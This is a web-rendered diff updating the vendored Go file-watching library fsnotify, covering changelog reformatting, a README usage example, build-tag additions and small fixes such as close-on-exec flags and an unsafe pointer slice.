[#378](https://github.com/fsnotify/fsnotify/pull/378)
|
||||
[#381](https://github.com/fsnotify/fsnotify/pull/381)
|
||||
[#385](https://github.com/fsnotify/fsnotify/pull/385)
|
||||
* Go 1.14+: Fix unsafe pointer conversion [#325](https://github.com/fsnotify/fsnotify/pull/325)
|
||||
|
||||
## [1.4.7] - 2018-01-09
|
||||
|
||||
* BSD/macOS: Fix possible deadlock on closing the watcher on kqueue (thanks @nhooyr and @glycerine)
|
||||
* Tests: Fix missing verb on format string (thanks @rchiossi)
|
||||
@ -10,62 +32,62 @@
|
||||
* Linux: Properly handle inotify's IN_Q_OVERFLOW event (thanks @zeldovich)
|
||||
* Docs: replace references to OS X with macOS
|
||||
|
||||
## v1.4.2 / 2016-10-10
|
||||
## [1.4.2] - 2016-10-10
|
||||
|
||||
* Linux: use InotifyInit1 with IN_CLOEXEC to stop leaking a file descriptor to a child process when using fork/exec [#178](https://github.com/fsnotify/fsnotify/pull/178) (thanks @pattyshack)
|
||||
|
||||
## v1.4.1 / 2016-10-04
|
||||
## [1.4.1] - 2016-10-04
|
||||
|
||||
* Fix flaky inotify stress test on Linux [#177](https://github.com/fsnotify/fsnotify/pull/177) (thanks @pattyshack)
|
||||
|
||||
## v1.4.0 / 2016-10-01
|
||||
## [1.4.0] - 2016-10-01
|
||||
|
||||
* add a String() method to Event.Op [#165](https://github.com/fsnotify/fsnotify/pull/165) (thanks @oozie)
|
||||
|
||||
## v1.3.1 / 2016-06-28
|
||||
## [1.3.1] - 2016-06-28
|
||||
|
||||
* Windows: fix for double backslash when watching the root of a drive [#151](https://github.com/fsnotify/fsnotify/issues/151) (thanks @brunoqc)
|
||||
|
||||
## v1.3.0 / 2016-04-19
|
||||
## [1.3.0] - 2016-04-19
|
||||
|
||||
* Support linux/arm64 by [patching](https://go-review.googlesource.com/#/c/21971/) x/sys/unix and switching to to it from syscall (thanks @suihkulokki) [#135](https://github.com/fsnotify/fsnotify/pull/135)
|
||||
|
||||
## v1.2.10 / 2016-03-02
|
||||
## [1.2.10] - 2016-03-02
|
||||
|
||||
* Fix golint errors in windows.go [#121](https://github.com/fsnotify/fsnotify/pull/121) (thanks @tiffanyfj)
|
||||
|
||||
## v1.2.9 / 2016-01-13
|
||||
## [1.2.9] - 2016-01-13
|
||||
|
||||
kqueue: Fix logic for CREATE after REMOVE [#111](https://github.com/fsnotify/fsnotify/pull/111) (thanks @bep)
|
||||
|
||||
## v1.2.8 / 2015-12-17
|
||||
## [1.2.8] - 2015-12-17
|
||||
|
||||
* kqueue: fix race condition in Close [#105](https://github.com/fsnotify/fsnotify/pull/105) (thanks @djui for reporting the issue and @ppknap for writing a failing test)
|
||||
* inotify: fix race in test
|
||||
* enable race detection for continuous integration (Linux, Mac, Windows)
|
||||
|
||||
## v1.2.5 / 2015-10-17
|
||||
## [1.2.5] - 2015-10-17
|
||||
|
||||
* inotify: use epoll_create1 for arm64 support (requires Linux 2.6.27 or later) [#100](https://github.com/fsnotify/fsnotify/pull/100) (thanks @suihkulokki)
|
||||
* inotify: fix path leaks [#73](https://github.com/fsnotify/fsnotify/pull/73) (thanks @chamaken)
|
||||
* kqueue: watch for rename events on subdirectories [#83](https://github.com/fsnotify/fsnotify/pull/83) (thanks @guotie)
|
||||
* kqueue: avoid infinite loops from symlinks cycles [#101](https://github.com/fsnotify/fsnotify/pull/101) (thanks @illicitonion)
|
||||
|
||||
## v1.2.1 / 2015-10-14
|
||||
## [1.2.1] - 2015-10-14
|
||||
|
||||
* kqueue: don't watch named pipes [#98](https://github.com/fsnotify/fsnotify/pull/98) (thanks @evanphx)
|
||||
|
||||
## v1.2.0 / 2015-02-08
|
||||
## [1.2.0] - 2015-02-08
|
||||
|
||||
* inotify: use epoll to wake up readEvents [#66](https://github.com/fsnotify/fsnotify/pull/66) (thanks @PieterD)
|
||||
* inotify: closing watcher should now always shut down goroutine [#63](https://github.com/fsnotify/fsnotify/pull/63) (thanks @PieterD)
|
||||
* kqueue: close kqueue after removing watches, fixes [#59](https://github.com/fsnotify/fsnotify/issues/59)
|
||||
|
||||
## v1.1.1 / 2015-02-05
|
||||
## [1.1.1] - 2015-02-05
|
||||
|
||||
* inotify: Retry read on EINTR [#61](https://github.com/fsnotify/fsnotify/issues/61) (thanks @PieterD)
|
||||
|
||||
## v1.1.0 / 2014-12-12
|
||||
## [1.1.0] - 2014-12-12
|
||||
|
||||
* kqueue: rework internals [#43](https://github.com/fsnotify/fsnotify/pull/43)
|
||||
* add low-level functions
|
||||
@ -77,22 +99,22 @@ kqueue: Fix logic for CREATE after REMOVE [#111](https://github.com/fsnotify/fsn
|
||||
* kqueue: fix regression in rework causing subdirectories to be watched [#48](https://github.com/fsnotify/fsnotify/issues/48)
|
||||
* kqueue: cleanup internal watch before sending remove event [#51](https://github.com/fsnotify/fsnotify/issues/51)
|
||||
|
||||
## v1.0.4 / 2014-09-07
|
||||
## [1.0.4] - 2014-09-07
|
||||
|
||||
* kqueue: add dragonfly to the build tags.
|
||||
* Rename source code files, rearrange code so exported APIs are at the top.
|
||||
* Add done channel to example code. [#37](https://github.com/fsnotify/fsnotify/pull/37) (thanks @chenyukang)
|
||||
|
||||
## v1.0.3 / 2014-08-19
|
||||
## [1.0.3] - 2014-08-19
|
||||
|
||||
* [Fix] Windows MOVED_TO now translates to Create like on BSD and Linux. [#36](https://github.com/fsnotify/fsnotify/issues/36)
|
||||
|
||||
## v1.0.2 / 2014-08-17
|
||||
## [1.0.2] - 2014-08-17
|
||||
|
||||
* [Fix] Missing create events on macOS. [#14](https://github.com/fsnotify/fsnotify/issues/14) (thanks @zhsso)
|
||||
* [Fix] Make ./path and path equivalent. (thanks @zhsso)
|
||||
|
||||
## v1.0.0 / 2014-08-15
|
||||
## [1.0.0] - 2014-08-15
|
||||
|
||||
* [API] Remove AddWatch on Windows, use Add.
|
||||
* Improve documentation for exported identifiers. [#30](https://github.com/fsnotify/fsnotify/issues/30)
|
||||
@ -146,51 +168,51 @@ kqueue: Fix logic for CREATE after REMOVE [#111](https://github.com/fsnotify/fsn
|
||||
* no tests for the current implementation
|
||||
* not fully implemented on Windows [#93](https://github.com/howeyc/fsnotify/issues/93#issuecomment-39285195)
|
||||
|
||||
## v0.9.3 / 2014-12-31
|
||||
## [0.9.3] - 2014-12-31
|
||||
|
||||
* kqueue: cleanup internal watch before sending remove event [#51](https://github.com/fsnotify/fsnotify/issues/51)
|
||||
|
||||
## v0.9.2 / 2014-08-17
|
||||
## [0.9.2] - 2014-08-17
|
||||
|
||||
* [Backport] Fix missing create events on macOS. [#14](https://github.com/fsnotify/fsnotify/issues/14) (thanks @zhsso)
|
||||
|
||||
## v0.9.1 / 2014-06-12
|
||||
## [0.9.1] - 2014-06-12
|
||||
|
||||
* Fix data race on kevent buffer (thanks @tilaks) [#98](https://github.com/howeyc/fsnotify/pull/98)
|
||||
|
||||
## v0.9.0 / 2014-01-17
|
||||
## [0.9.0] - 2014-01-17
|
||||
|
||||
* IsAttrib() for events that only concern a file's metadata [#79][] (thanks @abustany)
|
||||
* [Fix] kqueue: fix deadlock [#77][] (thanks @cespare)
|
||||
* [NOTICE] Development has moved to `code.google.com/p/go.exp/fsnotify` in preparation for inclusion in the Go standard library.
|
||||
|
||||
## v0.8.12 / 2013-11-13
|
||||
## [0.8.12] - 2013-11-13
|
||||
|
||||
* [API] Remove FD_SET and friends from Linux adapter
|
||||
|
||||
## v0.8.11 / 2013-11-02
|
||||
## [0.8.11] - 2013-11-02
|
||||
|
||||
* [Doc] Add Changelog [#72][] (thanks @nathany)
|
||||
* [Doc] Spotlight and double modify events on macOS [#62][] (reported by @paulhammond)
|
||||
|
||||
## v0.8.10 / 2013-10-19
|
||||
## [0.8.10] - 2013-10-19
|
||||
|
||||
* [Fix] kqueue: remove file watches when parent directory is removed [#71][] (reported by @mdwhatcott)
|
||||
* [Fix] kqueue: race between Close and readEvents [#70][] (reported by @bernerdschaefer)
|
||||
* [Doc] specify OS-specific limits in README (thanks @debrando)
|
||||
|
||||
## v0.8.9 / 2013-09-08
|
||||
## [0.8.9] - 2013-09-08
|
||||
|
||||
* [Doc] Contributing (thanks @nathany)
|
||||
* [Doc] update package path in example code [#63][] (thanks @paulhammond)
|
||||
* [Doc] GoCI badge in README (Linux only) [#60][]
|
||||
* [Doc] Cross-platform testing with Vagrant [#59][] (thanks @nathany)
|
||||
|
||||
## v0.8.8 / 2013-06-17
|
||||
## [0.8.8] - 2013-06-17
|
||||
|
||||
* [Fix] Windows: handle `ERROR_MORE_DATA` on Windows [#49][] (thanks @jbowtie)
|
||||
|
||||
## v0.8.7 / 2013-06-03
|
||||
## [0.8.7] - 2013-06-03
|
||||
|
||||
* [API] Make syscall flags internal
|
||||
* [Fix] inotify: ignore event changes
|
||||
@ -198,74 +220,74 @@ kqueue: Fix logic for CREATE after REMOVE [#111](https://github.com/fsnotify/fsn
|
||||
* [Fix] tests on Windows
|
||||
* lower case error messages
|
||||
|
||||
## v0.8.6 / 2013-05-23
|
||||
## [0.8.6] - 2013-05-23
|
||||
|
||||
* kqueue: Use EVT_ONLY flag on Darwin
|
||||
* [Doc] Update README with full example
|
||||
|
||||
## v0.8.5 / 2013-05-09
|
||||
## [0.8.5] - 2013-05-09
|
||||
|
||||
* [Fix] inotify: allow monitoring of "broken" symlinks (thanks @tsg)
|
||||
|
||||
## v0.8.4 / 2013-04-07
|
||||
## [0.8.4] - 2013-04-07
|
||||
|
||||
* [Fix] kqueue: watch all file events [#40][] (thanks @ChrisBuchholz)
|
||||
|
||||
## v0.8.3 / 2013-03-13
|
||||
## [0.8.3] - 2013-03-13
|
||||
|
||||
* [Fix] inoitfy/kqueue memory leak [#36][] (reported by @nbkolchin)
|
||||
* [Fix] kqueue: use fsnFlags for watching a directory [#33][] (reported by @nbkolchin)
|
||||
|
||||
## v0.8.2 / 2013-02-07
|
||||
## [0.8.2] - 2013-02-07
|
||||
|
||||
* [Doc] add Authors
|
||||
* [Fix] fix data races for map access [#29][] (thanks @fsouza)
|
||||
|
||||
## v0.8.1 / 2013-01-09
|
||||
## [0.8.1] - 2013-01-09
|
||||
|
||||
* [Fix] Windows path separators
|
||||
* [Doc] BSD License
|
||||
|
||||
## v0.8.0 / 2012-11-09
|
||||
## [0.8.0] - 2012-11-09
|
||||
|
||||
* kqueue: directory watching improvements (thanks @vmirage)
|
||||
* inotify: add `IN_MOVED_TO` [#25][] (requested by @cpisto)
|
||||
* [Fix] kqueue: deleting watched directory [#24][] (reported by @jakerr)
|
||||
|
||||
## v0.7.4 / 2012-10-09
|
||||
## [0.7.4] - 2012-10-09
|
||||
|
||||
* [Fix] inotify: fixes from https://codereview.appspot.com/5418045/ (ugorji)
|
||||
* [Fix] kqueue: preserve watch flags when watching for delete [#21][] (reported by @robfig)
|
||||
* [Fix] kqueue: watch the directory even if it isn't a new watch (thanks @robfig)
|
||||
* [Fix] kqueue: modify after recreation of file
|
||||
|
||||
## v0.7.3 / 2012-09-27
|
||||
## [0.7.3] - 2012-09-27
|
||||
|
||||
* [Fix] kqueue: watch with an existing folder inside the watched folder (thanks @vmirage)
|
||||
* [Fix] kqueue: no longer get duplicate CREATE events
|
||||
|
||||
## v0.7.2 / 2012-09-01
|
||||
## [0.7.2] - 2012-09-01
|
||||
|
||||
* kqueue: events for created directories
|
||||
|
||||
## v0.7.1 / 2012-07-14
|
||||
## [0.7.1] - 2012-07-14
|
||||
|
||||
* [Fix] for renaming files
|
||||
|
||||
## v0.7.0 / 2012-07-02
|
||||
## [0.7.0] - 2012-07-02
|
||||
|
||||
* [Feature] FSNotify flags
|
||||
* [Fix] inotify: Added file name back to event path
|
||||
|
||||
## v0.6.0 / 2012-06-06
|
||||
## [0.6.0] - 2012-06-06
|
||||
|
||||
* kqueue: watch files after directory created (thanks @tmc)
|
||||
|
||||
## v0.5.1 / 2012-05-22
|
||||
## [0.5.1] - 2012-05-22
|
||||
|
||||
* [Fix] inotify: remove all watches before Close()
|
||||
|
||||
## v0.5.0 / 2012-05-03
|
||||
## [0.5.0] - 2012-05-03
|
||||
|
||||
* [API] kqueue: return errors during watch instead of sending over channel
|
||||
* kqueue: match symlink behavior on Linux
|
||||
@ -273,22 +295,22 @@ kqueue: Fix logic for CREATE after REMOVE [#111](https://github.com/fsnotify/fsn
|
||||
* [Fix] kqueue: handle EINTR (reported by @robfig)
|
||||
* [Doc] Godoc example [#1][] (thanks @davecheney)
|
||||
|
||||
## v0.4.0 / 2012-03-30
|
||||
## [0.4.0] - 2012-03-30
|
||||
|
||||
* Go 1 released: build with go tool
|
||||
* [Feature] Windows support using winfsnotify
|
||||
* Windows does not have attribute change notifications
|
||||
* Roll attribute notifications into IsModify
|
||||
|
||||
## v0.3.0 / 2012-02-19
|
||||
## [0.3.0] - 2012-02-19
|
||||
|
||||
* kqueue: add files when watch directory
|
||||
|
||||
## v0.2.0 / 2011-12-30
|
||||
## [0.2.0] - 2011-12-30
|
||||
|
||||
* update to latest Go weekly code
|
||||
|
||||
## v0.1.0 / 2011-10-19
|
||||
## [0.1.0] - 2011-10-19
|
||||
|
||||
* kqueue: add watch on file creation to match inotify
|
||||
* kqueue: create file event
|
||||
|
2
vendor/github.com/fsnotify/fsnotify/LICENSE
generated
vendored
2
vendor/github.com/fsnotify/fsnotify/LICENSE
generated
vendored
@ -1,5 +1,5 @@
|
||||
Copyright (c) 2012 The Go Authors. All rights reserved.
|
||||
Copyright (c) 2012 fsnotify Authors. All rights reserved.
|
||||
Copyright (c) 2012-2019 fsnotify Authors. All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
modification, are permitted provided that the following conditions are
|
||||
|
71
vendor/github.com/fsnotify/fsnotify/README.md
generated
vendored
71
vendor/github.com/fsnotify/fsnotify/README.md
generated
vendored
@ -10,16 +10,16 @@ go get -u golang.org/x/sys/...
|
||||
|
||||
Cross platform: Windows, Linux, BSD and macOS.
|
||||
|
||||
|Adapter |OS |Status |
|
||||
|----------|----------|----------|
|
||||
|inotify |Linux 2.6.27 or later, Android\*|Supported [](https://travis-ci.org/fsnotify/fsnotify)|
|
||||
|kqueue |BSD, macOS, iOS\*|Supported [](https://travis-ci.org/fsnotify/fsnotify)|
|
||||
|ReadDirectoryChangesW|Windows|Supported [](https://ci.appveyor.com/project/NathanYoungman/fsnotify/branch/master)|
|
||||
|FSEvents |macOS |[Planned](https://github.com/fsnotify/fsnotify/issues/11)|
|
||||
|FEN |Solaris 11 |[In Progress](https://github.com/fsnotify/fsnotify/issues/12)|
|
||||
|fanotify |Linux 2.6.37+ | |
|
||||
|USN Journals |Windows |[Maybe](https://github.com/fsnotify/fsnotify/issues/53)|
|
||||
|Polling |*All* |[Maybe](https://github.com/fsnotify/fsnotify/issues/9)|
|
||||
| Adapter | OS | Status |
|
||||
| --------------------- | -------------------------------- | ------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| inotify | Linux 2.6.27 or later, Android\* | Supported |
|
||||
| kqueue | BSD, macOS, iOS\* | Supported |
|
||||
| ReadDirectoryChangesW | Windows | Supported |
|
||||
| FSEvents | macOS | [Planned](https://github.com/fsnotify/fsnotify/issues/11) |
|
||||
| FEN | Solaris 11 | [In Progress](https://github.com/fsnotify/fsnotify/issues/12) |
|
||||
| fanotify | Linux 2.6.37+ | [Planned](https://github.com/fsnotify/fsnotify/issues/114) |
|
||||
| USN Journals | Windows | [Maybe](https://github.com/fsnotify/fsnotify/issues/53) |
|
||||
| Polling | *All* | [Maybe](https://github.com/fsnotify/fsnotify/issues/9) |
|
||||
|
||||
\* Android and iOS are untested.
|
||||
|
||||
@ -33,6 +33,53 @@ All [releases](https://github.com/fsnotify/fsnotify/releases) are tagged based o
|
||||
|
||||
Go 1.6 supports dependencies located in the `vendor/` folder. Unless you are creating a library, it is recommended that you copy fsnotify into `vendor/github.com/fsnotify/fsnotify` within your project, and likewise for `golang.org/x/sys`.
|
||||
|
||||
## Usage
|
||||
|
||||
```go
|
||||
package main
|
||||
|
||||
import (
|
||||
"log"
|
||||
|
||||
"github.com/fsnotify/fsnotify"
|
||||
)
|
||||
|
||||
func main() {
|
||||
watcher, err := fsnotify.NewWatcher()
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
defer watcher.Close()
|
||||
|
||||
done := make(chan bool)
|
||||
go func() {
|
||||
for {
|
||||
select {
|
||||
case event, ok := <-watcher.Events:
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
log.Println("event:", event)
|
||||
if event.Op&fsnotify.Write == fsnotify.Write {
|
||||
log.Println("modified file:", event.Name)
|
||||
}
|
||||
case err, ok := <-watcher.Errors:
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
log.Println("error:", err)
|
||||
}
|
||||
}
|
||||
}()
|
||||
|
||||
err = watcher.Add("/tmp/foo")
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
<-done
|
||||
}
|
||||
```
|
||||
|
||||
## Contributing
|
||||
|
||||
Please refer to [CONTRIBUTING][] before opening an issue or pull request.
|
||||
@ -65,6 +112,10 @@ There are OS-specific limits as to how many watches can be created:
|
||||
* Linux: /proc/sys/fs/inotify/max_user_watches contains the limit, reaching this limit results in a "no space left on device" error.
|
||||
* BSD / OSX: sysctl variables "kern.maxfiles" and "kern.maxfilesperproc", reaching these limits results in a "too many open files" error.
|
||||
|
||||
**Why don't notifications work with NFS filesystems or filesystem in userspace (FUSE)?**
|
||||
|
||||
fsnotify requires support from underlying OS to work. The current NFS protocol does not provide network level support for file notifications.
|
||||
|
||||
[#62]: https://github.com/howeyc/fsnotify/issues/62
|
||||
[#18]: https://github.com/fsnotify/fsnotify/issues/18
|
||||
[#11]: https://github.com/fsnotify/fsnotify/issues/11
|
||||
|
1
vendor/github.com/fsnotify/fsnotify/fen.go
generated
vendored
1
vendor/github.com/fsnotify/fsnotify/fen.go
generated
vendored
@ -2,6 +2,7 @@
|
||||
// Use of this source code is governed by a BSD-style
|
||||
// license that can be found in the LICENSE file.
|
||||
|
||||
//go:build solaris
|
||||
// +build solaris
|
||||
|
||||
package fsnotify
|
||||
|
5
vendor/github.com/fsnotify/fsnotify/fsnotify.go
generated
vendored
5
vendor/github.com/fsnotify/fsnotify/fsnotify.go
generated
vendored
@ -2,6 +2,7 @@
|
||||
// Use of this source code is governed by a BSD-style
|
||||
// license that can be found in the LICENSE file.
|
||||
|
||||
//go:build !plan9
|
||||
// +build !plan9
|
||||
|
||||
// Package fsnotify provides a platform-independent interface for file system notifications.
|
||||
@ -63,4 +64,6 @@ func (e Event) String() string {
|
||||
}
|
||||
|
||||
// Common errors that can be reported by a watcher
|
||||
var ErrEventOverflow = errors.New("fsnotify queue overflow")
|
||||
var (
|
||||
ErrEventOverflow = errors.New("fsnotify queue overflow")
|
||||
)
|
||||
|
3
vendor/github.com/fsnotify/fsnotify/inotify.go
generated
vendored
3
vendor/github.com/fsnotify/fsnotify/inotify.go
generated
vendored
@ -2,6 +2,7 @@
|
||||
// Use of this source code is governed by a BSD-style
|
||||
// license that can be found in the LICENSE file.
|
||||
|
||||
//go:build linux
|
||||
// +build linux
|
||||
|
||||
package fsnotify
|
||||
@ -272,7 +273,7 @@ func (w *Watcher) readEvents() {
|
||||
|
||||
if nameLen > 0 {
|
||||
// Point "bytes" at the first byte of the filename
|
||||
bytes := (*[unix.PathMax]byte)(unsafe.Pointer(&buf[offset+unix.SizeofInotifyEvent]))
|
||||
bytes := (*[unix.PathMax]byte)(unsafe.Pointer(&buf[offset+unix.SizeofInotifyEvent]))[:nameLen:nameLen]
|
||||
// The filename is padded with NULL bytes. TrimRight() gets rid of those.
|
||||
name += "/" + strings.TrimRight(string(bytes[0:nameLen]), "\000")
|
||||
}
|
||||
|
5
vendor/github.com/fsnotify/fsnotify/inotify_poller.go
generated
vendored
5
vendor/github.com/fsnotify/fsnotify/inotify_poller.go
generated
vendored
@ -2,6 +2,7 @@
|
||||
// Use of this source code is governed by a BSD-style
|
||||
// license that can be found in the LICENSE file.
|
||||
|
||||
//go:build linux
|
||||
// +build linux
|
||||
|
||||
package fsnotify
|
||||
@ -40,12 +41,12 @@ func newFdPoller(fd int) (*fdPoller, error) {
|
||||
poller.fd = fd
|
||||
|
||||
// Create epoll fd
|
||||
poller.epfd, errno = unix.EpollCreate1(0)
|
||||
poller.epfd, errno = unix.EpollCreate1(unix.EPOLL_CLOEXEC)
|
||||
if poller.epfd == -1 {
|
||||
return nil, errno
|
||||
}
|
||||
// Create pipe; pipe[0] is the read end, pipe[1] the write end.
|
||||
errno = unix.Pipe2(poller.pipe[:], unix.O_NONBLOCK)
|
||||
errno = unix.Pipe2(poller.pipe[:], unix.O_NONBLOCK|unix.O_CLOEXEC)
|
||||
if errno != nil {
|
||||
return nil, errno
|
||||
}
|
||||
|
1
vendor/github.com/fsnotify/fsnotify/kqueue.go
generated
vendored
1
vendor/github.com/fsnotify/fsnotify/kqueue.go
generated
vendored
@ -2,6 +2,7 @@
|
||||
// Use of this source code is governed by a BSD-style
|
||||
// license that can be found in the LICENSE file.
|
||||
|
||||
//go:build freebsd || openbsd || netbsd || dragonfly || darwin
|
||||
// +build freebsd openbsd netbsd dragonfly darwin
|
||||
|
||||
package fsnotify
|
||||
|
3
vendor/github.com/fsnotify/fsnotify/open_mode_bsd.go
generated
vendored
3
vendor/github.com/fsnotify/fsnotify/open_mode_bsd.go
generated
vendored
@ -2,10 +2,11 @@
|
||||
// Use of this source code is governed by a BSD-style
|
||||
// license that can be found in the LICENSE file.
|
||||
|
||||
//go:build freebsd || openbsd || netbsd || dragonfly
|
||||
// +build freebsd openbsd netbsd dragonfly
|
||||
|
||||
package fsnotify
|
||||
|
||||
import "golang.org/x/sys/unix"
|
||||
|
||||
const openMode = unix.O_NONBLOCK | unix.O_RDONLY
|
||||
const openMode = unix.O_NONBLOCK | unix.O_RDONLY | unix.O_CLOEXEC
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
x
Reference in New Issue
Block a user